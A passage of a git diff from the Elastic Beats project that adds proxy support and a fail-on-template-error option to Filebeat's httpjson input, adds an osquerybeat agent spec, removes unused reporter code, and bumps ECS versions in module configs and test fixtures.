TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", enforceKibanaHandler(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }, "8.0.0")) return mux }, func(t *testing.T, host string) { @@ -271,7 +273,7 @@ func TestHTTPClient(t *testing.T) { mux := http.NewServeMux() mux.HandleFunc("/echo-hello", func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) - fmt.Fprintf(w, msg) + fmt.Fprint(w, msg) }) return mux }, func(t *testing.T, host string) { diff --git a/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go b/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go index b4bd233d205..779108c8a7b 100644 --- a/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/fleet/reporter.go @@ -15,13 +15,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/reporter/fleet/config" ) -const ( - defaultThreshold = 1000 - agentIDKey = "elastic.agent.id" -) - -type ackFn func() - type event struct { AgentID string `json:"agent_id"` EventType string `json:"type"` diff --git a/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go b/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go index 8d25852efe7..ce307e1fbab 100644 --- a/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go +++ b/x-pack/elastic-agent/pkg/reporter/fleet/reporter_test.go @@ -209,7 +209,7 @@ func getEvents(count int) []reporter.Event { } func newTestReporter(frequency time.Duration, threshold int) *Reporter { - log, _ := logger.New("") + log, _ := logger.New("", false) r := &Reporter{ info: &testInfo{}, queue: make([]fleetapi.SerializableEvent, 0), diff --git a/x-pack/elastic-agent/pkg/reporter/log/reporter.go b/x-pack/elastic-agent/pkg/reporter/log/reporter.go index e21864679e4..8651d7b800b 100644 --- a/x-pack/elastic-agent/pkg/reporter/log/reporter.go +++ b/x-pack/elastic-agent/pkg/reporter/log/reporter.go @@ -53,23 +53,5 @@ func defaultFormatFunc(e reporter.Event) string { ) } -type reportableEvent struct { - Type string - SubType string - Time string - Message string - Payload map[string]interface{} `json:"payload,omitempty"` -} - -func makeEventReportable(event reporter.Event) reportableEvent { - return reportableEvent{ - Type: event.Type(), - SubType: event.SubType(), - Time: event.Time().Format(timeFormat), - Message: event.Message(), - Payload: event.Payload(), - } -} - // Check it is reporter.Backend var _ reporter.Backend = &Reporter{} diff --git a/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go b/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go index 45f3452c0d6..f5d7d2d26e2 100644 --- a/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go +++ b/x-pack/elastic-agent/pkg/tokenbucket/token_bucket.go @@ -14,7 +14,6 @@ import ( // Bucket is a Token Bucket for rate limiting type Bucket struct { - size int dropAmount int rateChan chan struct{} closeChan chan struct{} diff --git a/x-pack/elastic-agent/spec/filebeat.yml b/x-pack/elastic-agent/spec/filebeat.yml index 6aacf99ccf0..c156d60aaa7 100644 --- a/x-pack/elastic-agent/spec/filebeat.yml +++ b/x-pack/elastic-agent/spec/filebeat.yml @@ -80,6 +80,7 @@ rules: - udp - unix - winlog + - filestream - filter_values: selector: inputs diff --git a/x-pack/elastic-agent/spec/osquerybeat.yml b/x-pack/elastic-agent/spec/osquerybeat.yml new file mode 100644 index 00000000000..8a7dd8b3538 --- /dev/null +++ b/x-pack/elastic-agent/spec/osquerybeat.yml @@ -0,0 +1,28 @@ +name: Osquerybeat +cmd: osquerybeat +args: ["-E", "setup.ilm.enabled=false", "-E", "setup.template.enabled=false", "-E", "management.mode=x-pack-fleet", "-E", "management.enabled=true", "-E", "logging.level=debug"] +action_input_types: +- osquery + +rules: +- fix_stream: {} +- inject_index: + type: logs + +- inject_stream_processor: + on_conflict: insert_after + type: logs + +- filter_values: + selector: inputs + key: type + values: + - osquery + +- filter: + selectors: + - inputs + - output + +when: length(${inputs}) > 0 and hasKey(${output}, 'elasticsearch') +constraints: ${runtime.arch} != 'arm64' \ No newline at end of file diff --git a/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc b/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc index 5d10e07a04e..e757ad6faea 100644 --- a/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-aws-s3.asciidoc @@ -11,8 +11,6 @@ AWS S3 ++++ -beta[] - Use the `aws-s3` input to retrieve logs from S3 objects that are pointed by messages from specific SQS queues. This input can, for example, be used to receive S3 server access logs to monitor detailed records for the requests that are made to diff --git a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc index be5763830ad..c698c99e4cc 100644 --- a/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc +++ b/x-pack/filebeat/docs/inputs/input-httpjson.asciidoc @@ -20,6 +20,7 @@ This input supports: * Pagination * Retries * Rate limiting +* Proxying * Request transformations * Response transformations @@ -53,10 +54,10 @@ filebeat.inputs: target: url.value value: http://localhost:9200/_search/scroll - set: - target: .url.params.scroll_id - value: '[[.last_request.body._scroll_id]]' + target: url.params.scroll_id + value: '[[.last_response.body._scroll_id]]' - set: - target: .body.scroll + target: body.scroll value: 5m ---- @@ -96,7 +97,7 @@ The `httpjson` input keeps a runtime state between requests. This state can be a The state has the following elements: - `last_response.url.value`: The full URL with params and fragments from the last request with a successful response. -- `last_request.url.params`: A map containing the params from the URL in `last_response.url.value`. +- `last_response.url.params`: A map containing the params from the URL in `last_response.url.value`. - `last_response.header`: A map containing the headers from the last successful response. - `last_response.body`: A map containing the parsed JSON body from the last successful response. This is the response as it comes from the remote server. - `last_response.page`: A number indicating the page number of the last response. @@ -133,6 +134,7 @@ Appends a value to a list. If the field does not exist, the first entry will be - `target` defines the destination field where the value is stored. - `value` defines the value that will be stored and it is a <>. - `default` defines the fallback value whenever `value` is empty or the template parsing fails. Default templates do not have access to any state, only to functions. +- `fail_on_template_error` if set to `true` an error will be returned and the request will be aborted when the template evaluation fails. Default is `false`. [float] ==== `delete` @@ -163,6 +165,7 @@ Sets a value. - `target` defines the destination field where the value is stored. - `value` defines the value that will be stored and it is a <>. - `default` defines the fallback value whenever `value` is empty or the template parsing fails. Default templates do not have access to any state, only to functions. +- `fail_on_template_error` if set to `true` an error will be returned and the request will be aborted when the template evaluation fails. Default is `false`. [[value-templates]] ==== Value templates @@ -383,6 +386,22 @@ This specifies SSL/TLS configuration. If the ssl section is missing, the host's CAs are used for HTTPS connections. See <> for more information. +[float] +==== `request.proxy_url` + +This specifies proxy configuration in the form of `http[s]://:@:` + +["source","yaml",subs="attributes"] +---- +filebeat.inputs: +# Fetch your public IP every minute. +- type: httpjson + config_version: 2 + interval: 1m + request.url: https://api.ipify.org/?format=json + request.proxy_url: http://proxy.example:8080 +---- + [float] ==== `request.retry.max_attempts` @@ -482,16 +501,16 @@ filebeat.inputs: - delete: target: body.very_confidential response.split: - target: .body.hits.hits + target: body.hits.hits response.pagination: - set: target: url.value value: http://localhost:9200/_search/scroll - set: - target: .url.params.scroll_id - value: '[[.last_request.body._scroll_id]]' + target: url.params.scroll_id + value: '[[.last_response.body._scroll_id]]' - set: - target: .body.scroll + target: body.scroll value: 5m ---- diff --git a/x-pack/filebeat/filebeat.reference.yml b/x-pack/filebeat/filebeat.reference.yml index 1d6778167d6..0773814bb2d 100644 --- a/x-pack/filebeat/filebeat.reference.yml +++ b/x-pack/filebeat/filebeat.reference.yml @@ -1369,7 +1369,11 @@ filebeat.modules: #var.oauth2.client.secret: "" # Oauth Token URL, should include the tenant ID - #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/token" + #var.oauth2.token_url: "https://login.microsoftonline.com/TENANT-ID/oauth2/v2.0/token" + + # Related scopes, default should be included + #var.oauth2.scopes: + # - "https://api.security.microsoft.com/.default" dhcp: enabled: true @@ -2157,6 +2161,8 @@ filebeat.modules: enabled: true notice: enabled: true + ntp: + enabled: true ntlm: enabled: true ocsp: diff --git a/x-pack/filebeat/input/httpjson/internal/v2/config_request.go b/x-pack/filebeat/input/httpjson/internal/v2/config_request.go index d2c93363c87..f64a03d9899 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/config_request.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/config_request.go @@ -88,6 +88,7 @@ type requestConfig struct { RedirectMaxRedirects int `config:"redirect.max_redirects"` RateLimit *rateLimitConfig `config:"rate_limit"` Transforms transformsConfig `config:"transforms"` + ProxyURL *urlConfig `config:"proxy_url"` } func (c requestConfig) getTimeout() time.Duration { diff --git a/x-pack/filebeat/input/httpjson/internal/v2/cursor.go b/x-pack/filebeat/input/httpjson/internal/v2/cursor.go index 053cdd87bd4..a324ac15dd5 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/cursor.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/cursor.go @@ -50,7 +50,7 @@ func (c *cursor) update(trCtx *transformContext) { } for k, cfg := range c.cfg { - v := cfg.Value.Execute(trCtx, transformable{}, cfg.Default, c.log) + v, _ := cfg.Value.Execute(trCtx, transformable{}, cfg.Default, c.log) _, _ = c.state.Put(k, v) c.log.Debugf("cursor.%s stored with %s", k, v) } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/input.go b/x-pack/filebeat/input/httpjson/internal/v2/input.go index f9c76226818..e8c8fe51082 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/input.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/input.go @@ -149,17 +149,22 @@ func run( func newHTTPClient(ctx context.Context, config config, tlsConfig *tlscommon.TLSConfig, log *logp.Logger) (*httpClient, error) { timeout := config.Request.getTimeout() + proxy_url := config.Request.ProxyURL // Make retryable HTTP client + transport := &http.Transport{ + DialContext: (&net.Dialer{ + Timeout: timeout, + }).DialContext, + TLSClientConfig: tlsConfig.ToConfig(), + DisableKeepAlives: true, + } + if proxy_url != nil && proxy_url.URL != nil { + transport.Proxy = http.ProxyURL(proxy_url.URL) + } client := &retryablehttp.Client{ HTTPClient: &http.Client{ - Transport: &http.Transport{ - DialContext: (&net.Dialer{ - Timeout: timeout, - }).DialContext, - TLSClientConfig: tlsConfig.ToConfig(), - DisableKeepAlives: true, - }, + Transport: transport, Timeout: timeout, CheckRedirect: checkRedirect(config.Request, log), }, diff --git a/x-pack/filebeat/input/httpjson/internal/v2/pagination.go b/x-pack/filebeat/input/httpjson/internal/v2/pagination.go index 4796742d9bc..6b28fa0f206 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/pagination.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/pagination.go @@ -124,8 +124,10 @@ func (iter *pageIterator) next() (*response, bool, error) { httpReq, err := iter.pagination.requestFactory.newHTTPRequest(iter.stdCtx, iter.trCtx) if err != nil { - if err == errNewURLValueNotSet { - // if this error happens here it means the transform used to pick the new url.value + if err == errNewURLValueNotSet || + err == errEmptyTemplateResult || + err == errExecutingTemplate { + // if this error happens here it means a transform // did not find any new value and we can stop paginating without error iter.done = true return nil, false, nil diff --git a/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go b/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go index 5c7e2c16a98..5d457dea7ae 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/rate_limiter.go @@ -104,7 +104,7 @@ func (r *rateLimiter) getRateLimit(resp *http.Response) (int64, error) { tr := transformable{} tr.setHeader(resp.Header) - remaining := r.remaining.Execute(emptyTransformContext(), tr, nil, r.log) + remaining, _ := r.remaining.Execute(emptyTransformContext(), tr, nil, r.log) if remaining == "" { return 0, errors.New("remaining value is empty") } @@ -122,7 +122,7 @@ func (r *rateLimiter) getRateLimit(resp *http.Response) (int64, error) { return 0, nil } - reset := r.reset.Execute(emptyTransformContext(), tr, nil, r.log) + reset, _ := r.reset.Execute(emptyTransformContext(), tr, nil, r.log) if reset == "" { return 0, errors.New("reset value is empty") } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/request.go b/x-pack/filebeat/input/httpjson/internal/v2/request.go index 2ef92175494..c02cab5be8b 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/request.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/request.go @@ -201,11 +201,10 @@ func (r *requester) doRequest(stdCtx context.Context, trCtx *transformContext, p trCtx.updateFirstEvent(maybeMsg.msg) } trCtx.updateLastEvent(maybeMsg.msg) + trCtx.updateCursor() n++ } - trCtx.updateCursor() - r.log.Infof("request finished: %d events published", n) return nil diff --git a/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go b/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go index 6a5867e5bbb..f2561ecd55b 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/transform_append.go @@ -16,16 +16,18 @@ import ( const appendName = "append" type appendConfig struct { - Target string `config:"target"` - Value *valueTpl `config:"value"` - Default *valueTpl `config:"default"` + Target string `config:"target"` + Value *valueTpl `config:"value"` + Default *valueTpl `config:"default"` + FailOnTemplateError bool `config:"fail_on_template_error"` } type appendt struct { - log *logp.Logger - targetInfo targetInfo - value *valueTpl - defaultValue *valueTpl + log *logp.Logger + targetInfo targetInfo + value *valueTpl + defaultValue *valueTpl + failOnTemplateError bool runFunc func(ctx *transformContext, transformable transformable, key, val string) error } @@ -100,15 +102,19 @@ func newAppend(cfg *common.Config, log *logp.Logger) (appendt, error) { } return appendt{ - log: log, - targetInfo: ti, - value: c.Value, - defaultValue: c.Default, + log: log, + targetInfo: ti, + value: c.Value, + defaultValue: c.Default, + failOnTemplateError: c.FailOnTemplateError, }, nil } func (append *appendt) run(ctx *transformContext, tr transformable) (transformable, error) { - value := append.value.Execute(ctx, tr, append.defaultValue, append.log) + value, err := append.value.Execute(ctx, tr, append.defaultValue, append.log) + if err != nil && append.failOnTemplateError { + return transformable{}, err + } if err := append.runFunc(ctx, tr, append.targetInfo.Name, value); err != nil { return transformable{}, err } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go b/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go index fcdb1fbbb39..4f975ba7db4 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/transform_set.go @@ -19,16 +19,18 @@ var errNewURLValueNotSet = errors.New("the new url.value was not set") const setName = "set" type setConfig struct { - Target string `config:"target"` - Value *valueTpl `config:"value"` - Default *valueTpl `config:"default"` + Target string `config:"target"` + Value *valueTpl `config:"value"` + Default *valueTpl `config:"default"` + FailOnTemplateError bool `config:"fail_on_template_error"` } type set struct { - log *logp.Logger - targetInfo targetInfo - value *valueTpl - defaultValue *valueTpl + log *logp.Logger + targetInfo targetInfo + value *valueTpl + defaultValue *valueTpl + failOnTemplateError bool runFunc func(ctx *transformContext, transformable transformable, key, val string) error } @@ -105,15 +107,19 @@ func newSet(cfg *common.Config, log *logp.Logger) (set, error) { } return set{ - log: log, - targetInfo: ti, - value: c.Value, - defaultValue: c.Default, + log: log, + targetInfo: ti, + value: c.Value, + defaultValue: c.Default, + failOnTemplateError: c.FailOnTemplateError, }, nil } func (set *set) run(ctx *transformContext, tr transformable) (transformable, error) { - value := set.value.Execute(ctx, tr, set.defaultValue, set.log) + value, err := set.value.Execute(ctx, tr, set.defaultValue, set.log) + if err != nil && set.failOnTemplateError { + return transformable{}, err + } if err := set.runFunc(ctx, tr, set.targetInfo.Name, value); err != nil { return transformable{}, err } @@ -155,11 +161,6 @@ func setURLParams(ctx *transformContext, transformable transformable, key, value } func setURLValue(ctx *transformContext, transformable transformable, _, value string) error { - // if the template processing did not find any value - // we fail without parsing - if value == "" || value == "" { - return errNewURLValueNotSet - } url, err := url.Parse(value) if err != nil { return errNewURLValueNotSet diff --git a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go index 9db90ce7ae1..6238bf06273 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl.go @@ -6,6 +6,7 @@ package v2 import ( "bytes" + "errors" "regexp" "strconv" "strings" @@ -21,6 +22,11 @@ const ( rightDelim = "]]" ) +var ( + errEmptyTemplateResult = errors.New("the template result is empty") + errExecutingTemplate = errors.New("the template execution failed") +) + type valueTpl struct { *template.Template } @@ -51,21 +57,21 @@ func (t *valueTpl) Unpack(in string) error { return nil } -func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal *valueTpl, log *logp.Logger) (val string) { - fallback := func(err error) string { - if err != nil { - log.Debugf("template execution failed: %v", err) - } +func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal *valueTpl, log *logp.Logger) (val string, err error) { + fallback := func(err error) (string, error) { if defaultVal != nil { log.Debugf("template execution: falling back to default value") return defaultVal.Execute(emptyTransformContext(), transformable{}, nil, log) } - return "" + return "", err } defer func() { if r := recover(); r != nil { - val = fallback(r.(error)) + val, err = fallback(errExecutingTemplate) + } + if err != nil { + log.Debugf("template execution failed: %v", err) } log.Debugf("template execution: evaluated template %q", val) }() @@ -83,9 +89,9 @@ func (t *valueTpl) Execute(trCtx *transformContext, tr transformable, defaultVal val = buf.String() if val == "" || strings.Contains(val, "") { - return fallback(nil) + return fallback(errEmptyTemplateResult) } - return val + return val, nil } var ( diff --git a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go index b9be148d1f0..0fd8e996487 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/value_tpl_test.go @@ -17,14 +17,15 @@ import ( func TestValueTpl(t *testing.T) { cases := []struct { - name string - value string - paramCtx *transformContext - paramTr transformable - paramDefVal string - expected string - setup func() - teardown func() + name string + value string + paramCtx *transformContext + paramTr transformable + paramDefVal string + expectedVal string + expectedError string + setup func() + teardown func() }{ { name: "can render values from ctx", @@ -36,7 +37,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "", - expected: "25", + expectedVal: "25", }, { name: "can render default value if execute fails", @@ -46,7 +47,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "25", - expected: "25", + expectedVal: "25", }, { name: "can render default value if template is empty", @@ -54,107 +55,123 @@ func TestValueTpl(t *testing.T) { paramCtx: emptyTransformContext(), paramTr: transformable{}, paramDefVal: "25", - expected: "25", + expectedVal: "25", + }, + { + name: "returns error if result is empty and no default is set", + value: "", + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + paramDefVal: "", + expectedVal: "", + expectedError: errEmptyTemplateResult.Error(), }, { name: "can render default value if execute panics", value: "[[.last_response.panic]]", paramDefVal: "25", - expected: "25", + expectedVal: "25", }, { - name: "func parseDuration", - value: `[[ parseDuration "-1h" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "-1h0m0s", + name: "returns error if panics and no default is set", + value: "[[.last_response.panic]]", + paramDefVal: "", + expectedVal: "", + expectedError: errExecutingTemplate.Error(), }, { - name: "func now", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ now ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseDuration", + value: `[[ parseDuration "-1h" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "-1h0m0s", }, { - name: "func now with duration", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ now (parseDuration "-1h") ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func now", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ now ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { - name: "func parseDate", - value: `[[ parseDate "2020-11-05T12:25:32.1234567Z" "RFC3339Nano" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32.1234567 +0000 UTC", + name: "func now with duration", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ now (parseDuration "-1h") ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 UTC", }, { - name: "func parseDate defaults to RFC3339", - value: `[[ parseDate "2020-11-05T12:25:32Z" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func parseDate", + value: `[[ parseDate "2020-11-05T12:25:32.1234567Z" "RFC3339Nano" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32.1234567 +0000 UTC", }, { - name: "func parseDate with custom layout", - value: `[[ (parseDate "Thu Nov 5 12:25:32 +0000 2020" "Mon Jan _2 15:04:05 -0700 2006") ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 12:25:32 +0000 UTC", + name: "func parseDate defaults to RFC3339", + value: `[[ parseDate "2020-11-05T12:25:32Z" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 UTC", }, { - name: "func formatDate", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" "America/New_York" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 08:25:32 EST 2020", + name: "func parseDate with custom layout", + value: `[[ (parseDate "Thu Nov 5 12:25:32 +0000 2020" "Mon Jan _2 15:04:05 -0700 2006") ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 12:25:32 +0000 UTC", }, { - name: "func formatDate defaults to UTC", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 13:25:32 UTC 2020", + name: "func formatDate", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" "America/New_York" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 08:25:32 EST 2020", }, { - name: "func formatDate falls back to UTC", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ formatDate (now) "UnixDate" "wrong/tz"]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "Thu Nov 5 13:25:32 UTC 2020", + name: "func formatDate defaults to UTC", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 13:25:32 UTC 2020", }, { - name: "func parseTimestamp", - value: `[[ (parseTimestamp 1604582732) ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func formatDate falls back to UTC", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ formatDate (now) "UnixDate" "wrong/tz"]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "Thu Nov 5 13:25:32 UTC 2020", }, { - name: "func parseTimestampMilli", - value: `[[ (parseTimestampMilli 1604582732000) ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseTimestamp", + value: `[[ (parseTimestamp 1604582732) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { - name: "func parseTimestampNano", - value: `[[ (parseTimestampNano 1604582732000000000) ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05 13:25:32 +0000 UTC", + name: "func parseTimestampMilli", + value: `[[ (parseTimestampMilli 1604582732000) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", + }, + { + name: "func parseTimestampNano", + value: `[[ (parseTimestampNano 1604582732000000000) ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05 13:25:32 +0000 UTC", }, { name: "func getRFC5988Link", @@ -171,8 +188,8 @@ func TestValueTpl(t *testing.T) { "", ), }, - paramTr: transformable{}, - expected: "https://example.com/api/v1/users?before=00ubfjQEMYBLRUWIEDKK", + paramTr: transformable{}, + expectedVal: "https://example.com/api/v1/users?before=00ubfjQEMYBLRUWIEDKK", }, { name: "func getRFC5988Link does not match", @@ -188,7 +205,7 @@ func TestValueTpl(t *testing.T) { }, paramTr: transformable{}, paramDefVal: "https://example.com/default", - expected: "https://example.com/default", + expectedVal: "https://example.com/default", }, { name: "func getRFC5988Link empty header", @@ -196,16 +213,16 @@ func TestValueTpl(t *testing.T) { paramCtx: emptyTransformContext(), paramTr: transformable{}, paramDefVal: "https://example.com/default", - expected: "https://example.com/default", + expectedVal: "https://example.com/default", }, { - name: "can execute functions pipeline", - setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, - teardown: func() { timeNow = time.Now }, - value: `[[ (parseDuration "-1h") | now | formatDate ]]`, - paramCtx: emptyTransformContext(), - paramTr: transformable{}, - expected: "2020-11-05T12:25:32Z", + name: "can execute functions pipeline", + setup: func() { timeNow = func() time.Time { return time.Unix(1604582732, 0).UTC() } }, + teardown: func() { timeNow = time.Now }, + value: `[[ (parseDuration "-1h") | now | formatDate ]]`, + paramCtx: emptyTransformContext(), + paramTr: transformable{}, + expectedVal: "2020-11-05T12:25:32Z", }, } @@ -220,10 +237,20 @@ func TestValueTpl(t *testing.T) { } tpl := &valueTpl{} assert.NoError(t, tpl.Unpack(tc.value)) - defTpl := &valueTpl{} - assert.NoError(t, defTpl.Unpack(tc.paramDefVal)) - got := tpl.Execute(tc.paramCtx, tc.paramTr, defTpl, logp.NewLogger("")) - assert.Equal(t, tc.expected, got) + + var defTpl *valueTpl + if tc.paramDefVal != "" { + defTpl = &valueTpl{} + assert.NoError(t, defTpl.Unpack(tc.paramDefVal)) + } + + got, err := tpl.Execute(tc.paramCtx, tc.paramTr, defTpl, logp.NewLogger("")) + assert.Equal(t, tc.expectedVal, got) + if tc.expectedError == "" { + assert.NoError(t, err) + } else { + assert.Equal(t, tc.expectedError, err.Error()) + } }) } } diff --git a/x-pack/filebeat/module/activemq/audit/config/audit.yml b/x-pack/filebeat/module/activemq/audit/config/audit.yml index 5b5cf7df03f..49973f8d997 100644 --- a/x-pack/filebeat/module/activemq/audit/config/audit.yml +++ b/x-pack/filebeat/module/activemq/audit/config/audit.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/activemq/log/config/log.yml b/x-pack/filebeat/module/activemq/log/config/log.yml index 58a8f27a0f3..b05d5769b27 100644 --- a/x-pack/filebeat/module/activemq/log/config/log.yml +++ b/x-pack/filebeat/module/activemq/log/config/log.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml index fc501fd4705..fd9402e2699 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/aws-s3.yml @@ -66,4 +66,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml index 8e04baa3395..1feedff152e 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/config/file.yml +++ b/x-pack/filebeat/module/aws/cloudtrail/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 diff --git a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json index 50253665f08..5a1a6e7db81 100644 --- a/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json +++ b/x-pack/filebeat/module/aws/cloudtrail/test/add-user-to-group-json.log-expected.json @@ -44,6 +44,7 @@ "user.name": "Alice", "user.target.name": "Bob", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "AWSConsole" } diff 